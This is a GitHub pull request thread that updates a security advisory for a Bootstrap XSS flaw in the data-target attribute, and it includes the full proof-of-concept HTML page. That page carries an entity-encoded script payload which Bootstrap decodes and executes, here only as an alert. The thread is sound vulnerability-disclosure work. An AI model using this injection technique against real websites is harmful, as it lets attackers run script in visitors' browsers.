Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

[GHSA-4p24-vmcr-4gqj] Bootstrap XSS vulnerability #3281

Conversation

roka-actico
Copy link

Updates

  • Affected products
  • Description
  • References

Comments
we used the demonstration example from twbs/bootstrap#20184 (comment) and proofed, that also version 2.0.4 and above are affected, but 2.0.3 and below not, see https://jsbin.com/dahojakupe/edit?html,output

@github-actions github-actions bot changed the base branch from main to roka-actico/advisory-improvement-3281 January 12, 2024 13:56
@darakian
Copy link
Contributor

darakian commented Jan 12, 2024

Many thanks for the POC and the PR. For the sake of archiving it the poc follows on this post. I'll add this thread as a reference rather than your jsbin link.

POC

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <title>Bootstrap Bug Report</title>

    <!-- Bootstrap's CSS -->
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/2.0.4/css/bootstrap.css" rel="stylesheet">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/latest/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/latest/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>
    
    <!-- Follow these instructions, please! -->
    <div class="container">
      <h1>Test-case for Bootstrap bug #20184</h1>
      <p class="lead">
        <a href="https://github.com/twbs/bootstrap/issues/20184">#20184 – XSS in data-target attribute</a>
      </p>
      <p class="lead">
        <button class="btn btn-modal btn-lg btn-primary" data-toggle="modal" data-target=".modal.the-good">Show the good modal</button>
        <br>
        Demonstrates intended use of <code>data-target</code> attribute.
      </p>
      <p class="lead">
        <button class="btn btn-modal btn-lg btn-primary" data-toggle="modal" data-target="&#x3C;div class=&#x22;modal fade the-bad&#x22; tabindex=&#x22;-1&#x22; role=&#x22;dialog&#x22;&#x3E;&#x3C;div class=&#x22;modal-dialog&#x22; role=&#x22;document&#x22;&#x3E;&#x3C;div class=&#x22;modal-content&#x22;&#x3E;&#x3C;div class=&#x22;modal-header&#x22;&#x3E;&#x3C;button type=&#x22;button&#x22; class=&#x22;close&#x22; data-dismiss=&#x22;modal&#x22; aria-label=&#x22;Close&#x22;&#x3E;&#x3C;span aria-hidden=&#x22;true&#x22;&#x3E;&#x26;times;&#x3C;/span&#x3E;&#x3C;/button&#x3E;&#x3C;h4 class=&#x22;modal-title&#x22;&#x3E;The Bad Modal&#x3C;/h4&#x3E;&#x3C;/div&#x3E;&#x3C;div class=&#x22;modal-body&#x22;&#x3E;This modal&#x27;s HTTML source code is declared inline, inside the data-target attribute of it&#x27;s show-button&#x3C;/div&#x3E;&#x3C;/div&#x3E;&#x3C;/div&#x3E;&#x3C;/div&#x3E;">Show the bad modal</button>
        <br>
        Demonstrates questionable use of <code>data-target</code> attribute.
      </p>
      <p class="lead">
        <button class="btn btn-modal btn-lg btn-primary" data-toggle="modal" data-target="&#x3C;script&#x3E;alert(&#x22;Owned! An attacker, who can inject a data-target attribute into the document, now has full control over the JS!\nThis is a XSS vulnerability, even though all HTML source-code is properly encoded. The browser parses it, then Bootstrap passes the decoded value back for another round of HTML parsing.&#x22;)&#x3C;/script&#x3E;">Show the ugly modal (XSS)</button>
        <br>
        Demonstrates misuse of <code>data-target</code> attribute.
      </p>
    </div>
    
    <div class="modal fade the-good" tabindex="-1" role="dialog">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <h4 class="modal-title">The Good Modal</h4>
          </div>
          <div class="modal-body">
            This modal is declared right in the HTML document. The show button references it via a CSS selector.
          </div>
        </div>
      </div>
    </div>

    <!-- jQuery and Bootstrap's JavaScript-->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/2.0.4/js/bootstrap.js"></script>
  </body>
</html>

@advisory-database advisory-database bot merged commit 56ab059 into roka-actico/advisory-improvement-3281 Jan 12, 2024
2 checks passed
@advisory-database
Copy link
Contributor

Hi @roka-actico! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future!

@advisory-database advisory-database bot deleted the roka-actico-GHSA-4p24-vmcr-4gqj branch January 12, 2024 20:20
# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants